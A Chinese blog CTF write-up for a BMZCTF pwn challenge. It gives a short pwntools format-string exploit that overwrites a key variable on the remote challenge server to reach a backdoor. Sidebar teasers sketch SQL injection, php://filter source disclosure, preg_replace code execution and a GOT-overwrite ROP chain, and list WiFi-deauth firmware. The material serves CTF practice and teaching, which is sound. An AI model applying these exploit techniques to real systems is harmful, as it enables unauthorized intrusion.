[BMZCTF-pwn] 01-XCTF 4th-CyberEarth

最新推荐文章于 2022-03-10 21:00:00 发布
最新推荐文章于 2022-03-10 21:00:00 发布
阅读量197 收藏
点赞数
分类专栏: CTF pwn 文章标签: 安全 pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/122877793
版权

给了个后门,pie未开,直接通过printf漏洞将key写为指定值即可。

from pwn import *

p = remote('www.bmzclub.cn', 21355)

context(arch='i386', log_level = 'debug')
payload = fmtstr_payload(12, {0x0804a048: 35795746}) #key = xxxx
p.sendline(payload)

p.interactive()

石氏是时试
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XCTF攻防世界题目ics-04(XCTF 4th-CyberEarth)
daqiangdetianxia的博客
08-18 467
为了避免眼高手低,能用手工我决定把一些题目的详细思路和思考过程写一遍。就当是总结吧。 简单的一道sql注入题目加一个简单的逻辑漏洞。 信息搜集 页面:login.php,register.php,findpwd.php 服务器:Apache/2.4.7 (Ubuntu) ICS工业控制系统 漏洞查找 一、 经过测试,发现findpwd页面存在sql注入漏洞 二、手工注入 1.确定列数 admin1' order by 4#经过测试,一共有四列,其中admin1是我自己注册的用户。 2.确定注入列数. .
[XCTF 4th-CyberEarth]ics-05
sGanYu
08-26 2129
其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统 打开题目,是一个工控云管理系统,随意点击旁边的菜单,发现只有设备维护中心可以正常进入 无意间点击左上角‘云平台设备维护中心’之后,发现页面进行跳转,page=index 将URL内的index改为任何字符,页面都会进行回显 在index后添加一个.php,页面回显ok,说明index.php存在,可以尝试读取一下 这里需要用到php://filter协议读内容 php://filter/read=conver..
[CTF]文件包含(php伪协议)+代码执行(XCTF 4th-CyberEarth)
baguangman5501的博客
09-23 811
原作者:admin [原理] 文件包含读源码、x-forwarded-for preg_replace 函数执行一个正则表达式的搜索和替换,preg_replce正则表达式部分包含e参数的时候,进行替换的部分会被执行。 [目的] 掌握正则表达式、伪协议读取源码 [环境] windows [工具] firefox、burp [步骤] 1.进入云平台设备维护中心页面,利用php伪协议读取源码...
[XCTF-pwn] 37_xctf-4th-CyberEarth_play
weixin_52640415的博客
03-10 247
又买一个,实在是代码太我看不明白了。 解题思路: 用同一个用户登录两次,选择不同的攻击方式,直到成功。 成功后,输入名字的地方有溢出,在这里写入rop:泄露,修改got.puts为system,再调用puts(/bin/sh) 验证后的exp: from pwn import * ''' patchelf --set-interpreter /home/shi/buuctf/buuoj_2.23_i386/ld-2.23-i386-0ubuntu11.so pw...
攻防世界-web-ics-06--XCTF 4th-CyberEarth
Sea_Sand息禅
04-23 6281
进入index.php,发现可以传参,bp爆破,当id=2333时拿到flag
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
ctf题库ctf-pwn赛题收集
03-31
ctf题库 CTF(夺旗赛)题库是一个由安全专家和爱好者们制作的一系列网络安全挑战。... ...每个类别都包含多个挑战,每个挑战都有一个或多个标志(flag)。参赛者必须通过解决每个挑战来获取相应的标志,然后提交标志以获得...
攻防世界web高手进阶区ics-05(XCTF 4th-CyberEarth)WriteUp
D-R0s1的博客
08-04 4980
解题部分 题目来源 攻防世界web高手进阶区ics-05(XCTF 4th-CyberEarth) 1.拿到题目以后,发现是一个index.php的页面,并且设备…没有显示完全,此位置可疑。 2.源代码中发现?page=index,出现page这个get参数,联想到可能存在文件包含读源码的漏洞,尝试读取index.php的页面源码 通过php内置协议直接读取代码 /index.php?page=p...
XCTF攻防世界进阶区writeup(1-5)
stepone4ward的博客
07-04 1270
1. isc-06 进入题目后看到url后存在参数id,尝试各种注入方式后均无果,使用bp对id参数进行爆破后得到flag。 2.NewsCenter 对search参数进行bool类型的盲注 import requests s=requests.session() url="http://111.198.29.45:38153/index.php" key='' for i in range(1...
攻防世界xctf web进阶ics_05writeup
qq_43370221的博客
04-19 327
文章目录isc_05利用PHP伪协议来得到index.php的源码利用 preg_replace漏洞抓包改包&利用get来构造参数 isc_05 检索网页 发现只有一个页面可以打开 发现了类似文件包含的url 可以猜测page是通过get传入了一个文件 ,所以尝试文件包含。又因为index.php页面存在异常 所以尝试读入index.php 利用PHP伪协议来得到index.php的...
BABYRE XCTF 4th-WHCTF-2017
qq_41071646的博客
04-27 756
简单的 smc题 import sys from idautils import * from idc import * import idaapi if __name__ =="__main__": start_addr=0x600B00 for i in range(182): PatchByte(start_addr+i,Byte(start_addr+i)^0xC) ...
CTF Web题 部分WP
热门推荐
wywwzjj
11-26 12万+
1.web2 听说聪明的人都能找到答案 http://123.206.87.240:8002/web2/ CTRL + u 查看源代码 2.计算器 http://123.206.87.240:8002/yanzhengma/ 改一下字符输入长度的限制 3.web基础$_GET http://123.206.87.240:8002/get/ ?var=val 4.web基础$_P...
xctf-pwn-“反应釜开关控制 & 实时数据监测 & greeting-150“
njh18790816639的博客
07-31 332
反应釜开关控制 该pwn题目逻辑较为简单。 通过三次栈溢出,可以得到shell函数地址。 发现PIE保护没有开启,其实这里是直接可以栈溢出到shell函数的地址的,不必弄那么复杂! 这道题目的PIE应该是忘记开了,题目原本设计的目的是想让我们使用三次栈溢出来得到shell的。 分界线 这里我感觉应该不是这么简单的,所以我又去进行寻找资料,发现是XCTF 4th-CyberEarth里面的盲打题。意味着我们没有ELF文件,所以我们就没有办法来想这么简单的去做出来。 实时数据监测 发现什么保护都没有
pwn CTF 4th-QCTF-2018 stack2
qq_41071646的博客
01-23 3410
先把程序跑一遍看看·~~~~~~~ 然后我们好像可以 加数还有 改变数   4功能好像还是 求平均数的 ~~~~ 看来功能还是很齐全的吗~~~~  然后我们 咦 这里的平均数为啥是  2.00呢 ~!~~~~  带着疑问去 看ida 这里好像没有什么毛病  限制了 输入的数量是99 然后往下看   这里就是bug了    因为我们没有检查v13数组的边界 这里我们可...
攻防世界 xctf cr4-poor-rsa的 writeup
dchua123的专栏
03-29 2046
1、下载解压后的是一个文件,用file命令查看是rar文件 2、改后缀解压得flag.b64和key.pub。尝试用RsaCtfTool破解,于是先对flag进行base64解码,保持为flag.b64.bin python3 RsaCtfTool.py --publickey ~/Desktop/key.pub --uncipherfile ~/Desktop/flag.b64.bi...
攻防世界WEB进阶之isc-04
harry_c的博客
08-06 1752
攻防世界WEB进阶之isc-04第一步:分析第二步:实操第三步:答案 第一步:分析 难度系数: 4星 题目来源: XCTF 4th-CyberEarth 题目描述:工控云管理系统新添加的登录和注册页面存在漏洞,请找出flag。 题目页面是之前做过的,但是漏洞位置换了,在注册和登录页面,使用注册功能反复注册,返回的注册页面显示为普通用户注册,并且登录之后显示普通用户登录没什么用,猜想是否存在特殊的账...
mqtt-pwn安装
最新发布
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值